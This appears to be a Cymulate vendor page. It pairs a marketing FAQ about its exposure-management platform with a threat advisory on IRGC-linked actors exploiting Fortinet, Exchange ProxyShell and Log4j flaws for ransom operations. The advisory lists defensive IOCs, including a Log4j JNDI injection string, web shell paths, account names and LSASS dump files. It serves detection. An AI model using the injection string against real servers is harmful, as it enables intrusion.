What vulnerabilities have IRGC-linked cyber actors exploited for ransom operations?

IRGC-linked cyber actors have exploited several known vulnerabilities for initial access, including Fortinet FortiOS (CVE-2018-13379, CVE-2020-12812, CVE-2019-5591), Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and VMware Horizon Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105). These vulnerabilities have been used to deploy tools for ransom, extortion, and data exfiltration.

How do IRGC-affiliated actors use initial access for ransom and extortion?

After gaining initial access, IRGC-affiliated actors may encrypt data for ransom, exfiltrate data for extortion, or use a combination of both (double extortion). They determine their course of action based on the perceived value of the data, sometimes selling or using it to pressure victims into paying ransom demands.

What indicators of compromise (IOCs) are associated with ProxyShell and Log4j exploitation?

IOCs for ProxyShell exploitation include web shells with naming conventions like aspx_[random].aspx, login.aspx, or default.aspx in Exchange directories. For Log4j exploitation, IOCs include user agent strings like ${jndi:ldap//148.251.71.182:1389/RCE} and files such as RCE.class.

How do IRGC-linked actors maintain persistence in compromised environments?

They establish new user accounts on domain controllers, servers, and workstations, often enabling built-in Windows accounts (e.g., DefaultAccount) and escalating privileges to administrator level. Some accounts are created to mimic legitimate ones, making detection harder.

What ransom techniques are used by IRGC-affiliated actors?

They force BitLocker activation to encrypt data and hold decryption keys for ransom. Ransom notes are sent via email, left as .txt files, or printed on networked printers, often including contact details for negotiation.

How do these actors exfiltrate credentials and sensitive data?

They dump and exfiltrate the Local Security Authority Subsystem Service (LSASS) process memory, storing files like sassl.pmd, ssasl.zip, or lsass.dmp in temporary directories for credential harvesting and data theft.

What scheduled tasks may indicate IRGC-linked activity?

Unrecognized scheduled tasks or actions named Wininet, Wininet', WinLogon, or CacheTask may be associated with IRGC-linked activity, though some may be legitimate.

What are common account names used by IRGC-affiliated actors for persistence?

Common account names include Domain Admin, it_admin, DefaultAccount, and Default01. These may be created to resemble legitimate accounts and evade detection.

How does Cymulate help organizations defend against threats like those from IRGC-linked actors?

Cymulate enables organizations to simulate real-world attacks, validate security controls, and identify exploitable exposures. By continuously testing defenses against tactics used by groups like IRGC-linked actors, organizations can proactively remediate vulnerabilities and improve resilience.

What resources does Cymulate offer for understanding and mitigating advanced threats?

Cymulate provides whitepapers, technical guides, solution briefs, and case studies that cover exposure management, threat validation, detection engineering, and more. These resources help organizations stay informed and implement best practices.

What are the key features of the Cymulate Exposure Management Platform?

Cymulate's platform offers continuous threat validation, breach and attack simulation (BAS), continuous automated red teaming (CART), exposure analytics, attack path discovery, cloud validation, and an extensive threat library with daily updates. These features help organizations proactively identify and remediate security gaps.

Does Cymulate support integration with other security tools?

Yes, Cymulate integrates with a wide range of security technologies, including EDR and anti-malware (e.g., CrowdStrike Falcon, Cisco Secure Endpoint), SIEM (CrowdStrike Falcon LogScale), cloud security (AWS GuardDuty, Check Point CloudGuard), network security (Akamai Guardicore), and vulnerability management (CrowdStrike Falcon Spotlight).

How does Cymulate's Threat (IoC) updates feature improve threat resilience?

The Threat (IoC) updates feature provides recommended Indicators of Compromise that can be exported and applied directly to security controls, improving resilience by enabling rapid defense against new threats.

What technical documentation is available for Cymulate users?

Cymulate offers whitepapers, guides, solution briefs, data sheets, and industry reports covering exposure management, CTEM, detection engineering, vulnerability management, and more. These resources provide in-depth technical knowledge for users.

How often is Cymulate's threat library updated?

Cymulate's threat library is updated daily, ensuring that organizations can test their defenses against the latest attack techniques and emerging threats.

What is Cymulate's approach to cloud security validation?

Cymulate provides dedicated validation features for hybrid and cloud environments, allowing organizations to assess and optimize their cloud security controls against real-world threats.

How does Cymulate support detection engineering?

Cymulate helps organizations build, validate, and optimize threat detections at scale, enabling teams to tune SIEM, EDR, and XDR controls for improved mean time to detect and respond.

What is Cymulate's implementation process like?

Cymulate is agentless and requires no additional hardware or complex configuration. Customers report that deployment is quick and straightforward, allowing simulations to run almost immediately.

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams across industries such as financial services, healthcare, retail, media, and transportation. Organizations of all sizes, from small teams to enterprises with over 10,000 employees, use Cymulate to enhance their security posture.

What business impact can customers expect from Cymulate?

Customers have reported an 81% reduction in cyber risk within four months, a 60% increase in team efficiency, a 52% reduction in critical exposures, and a 30% improvement in threat prevention. These outcomes are supported by case studies such as Hertz Israel and Nemours Children's Health.

How does Cymulate address the pain points of security teams?

Cymulate solves challenges such as overwhelming threat volume, lack of visibility, unclear prioritization, operational inefficiencies, fragmented tools, cloud complexity, and communication barriers by providing a unified, automated, and evidence-based exposure management platform.

Are there case studies showing Cymulate's effectiveness?

Yes, Cymulate features case studies across industries, including Hertz Israel (81% risk reduction), Nemours Children's Health (improved visibility), and a financial services organization (automated testing and prioritization).

How does Cymulate tailor solutions for different security roles?

Cymulate addresses the unique needs of CISOs (metrics and alignment), SecOps (automation and efficiency), red teams (scalable offensive testing), and vulnerability management teams (prioritization and consolidation).

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive, user-friendly interface and quick implementation. Testimonials highlight the platform's ability to deliver actionable insights with minimal effort.

What security and compliance certifications does Cymulate hold?

Cymulate is certified for SOC2 Type II, ISO 27001:2013 (Information Security Management), ISO 27701 (Privacy Information Management), ISO 27017 (Cloud Services Security), and CSA STAR Level 1. These certifications demonstrate Cymulate's commitment to security, privacy, and cloud compliance.

How does Cymulate ensure data security and privacy?

Cymulate hosts its services in secure AWS data centers, uses encryption for data in transit (TLS 1.2+) and at rest (AES-256), and follows a strict Secure Development Lifecycle (SDLC) with continuous vulnerability scanning and annual third-party penetration tests.

Is Cymulate GDPR compliant?

Yes, Cymulate adopts a holistic approach to GDPR, incorporating data protection by design and maintaining a dedicated privacy and security team, including a Data Protection Officer (DPO) and Chief Information Security Officer (CISO).

How does Cymulate train its employees on security?

All Cymulate employees receive ongoing security awareness training, are subject to phishing campaign tests, and must adhere to comprehensive security policies.

What is Cymulate's pricing model?

Cymulate operates on a subscription-based pricing model tailored to each organization's needs. Pricing depends on the package, number of assets, and scenarios selected. For a custom quote, schedule a demo with Cymulate's team.

How does Cymulate compare to AttackIQ?

While AttackIQ provides automated security validation, Cymulate offers a more comprehensive threat scenario library, advanced AI-powered features, and greater ease of use.

What differentiates Cymulate from Mandiant Security Validation?

Cymulate stands out for its continuous innovation, AI-powered automation, and expanded exposure management capabilities, whereas Mandiant has seen less innovation in recent years.

How does Cymulate compare to Pentera?

Pentera focuses on attack path validation, but Cymulate provides a more complete exposure validation platform, covering the full kill chain and offering cloud control validation.

What makes Cymulate different from Picus Security?

Picus Security offers BAS with on-prem options, but Cymulate delivers a comprehensive exposure validation platform with full kill chain coverage and cloud control validation.

How does Cymulate compare to SafeBreach?

SafeBreach provides breach and attack simulation, but Cymulate offers a full CTEM solution, comprehensive exposure validation, and advanced automation with the industry's largest attack library.

What are the advantages of Cymulate over Scythe?

Scythe is built for advanced red teams to build custom attack campaigns, while Cymulate offers automated, no-code workflows, daily threat updates, and actionable remediation guidance, making it more user-friendly for security teams.

When was Cymulate founded and how large is the company?

Cymulate was founded in 2016 and has a global presence with offices in eight locations, serving over 1,000 customers in 50 countries.

What is Cymulate's mission and vision?

Cymulate's mission is to revolutionize cybersecurity by fostering a proactive approach to managing threats, empowering organizations to effectively manage their security posture and improve resilience.

How does Cymulate contribute to the future of cybersecurity?

Cymulate drives innovation in exposure management, continuous threat validation, and automation, helping organizations shift from reactive to proactive security strategies and align with emerging industry trends.

IRGC-Linked Cyber Actors Exploit Vulnerabilities for Ransom Ops

September 18, 2022

As reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, and CVE-2021-34473 (a ProxyShell vulnerability).
The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities CVE-2021-34523 and CVE-2021-31207.
The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems.
The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.

Since the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access.
In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities CVE-2021-44228 ("Log4Shell"), CVE-2021-45046, and CVE-2021-45105 for initial access.

The IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts.
After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or "double extortion" ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.

nitial Access [TA0001]
As stated in the Technical Details section previously reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the IRGC-affiliated actors gained initial access by exploiting known vulnerabilities [T1190].

The following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:

Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories:
C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyecpauth
C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth
C:inetpubwwwrootaspnet_client
The following IOCs, observed as of December 2021, are indicative of Log4j vulnerability exploitation on targeted entity networks:

${jndi:ldap//148.251.71.182:1389/RCE} (user agent string)
RCE.class
Execution [TA0002]
The IRGC-affiliated actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:

Wininet
Wininet'
WinLogon
CacheTask
Note: The potential exists that tasks associated with CacheTask or Wininet may be legitimate. For additional tasks used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Persistence [TA0003]
The IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:

Domain Admin
it_admin
DefaultAccount
Default01
Note: For additional account usernames associated with this activity, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Exfiltration [TA0010]
The authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:

C:WindowsTempsassl[.]pmd
C:WindowsTempssasl[.]zip
C:UsersDefaultAccountAppDataLocalTemplsass[.]dmp
C:UsersDefaultAccountAppDataLocalTemplsass[.]zip
Impact [TA0040]
The IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [T1486] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity's networked printer(s). The notes included the following contact information:

@BuySafety (Telegram)
@WeRBits (Telegram)
+93794415076 (WhatsApp)
werbits@onionmail[.]org
buysafety@onionmail[.]org
yacashcash@rambler[.]ru

Featured Resources

View More Resources

blog

CVE-2026-26117: Hijacking Azure Arc on Windows for Local Privilege Escalation & Cloud Identity Takeover

CVE-2026-26117 lets attackers hijack Azure Arc on Windows, escalate to SYSTEM, and seize the machine’s cloud identity.

Demo

Exposure Validation Demo

Demo of automated offensive simulations validating detection, prevention, and IOC coverage

Learn More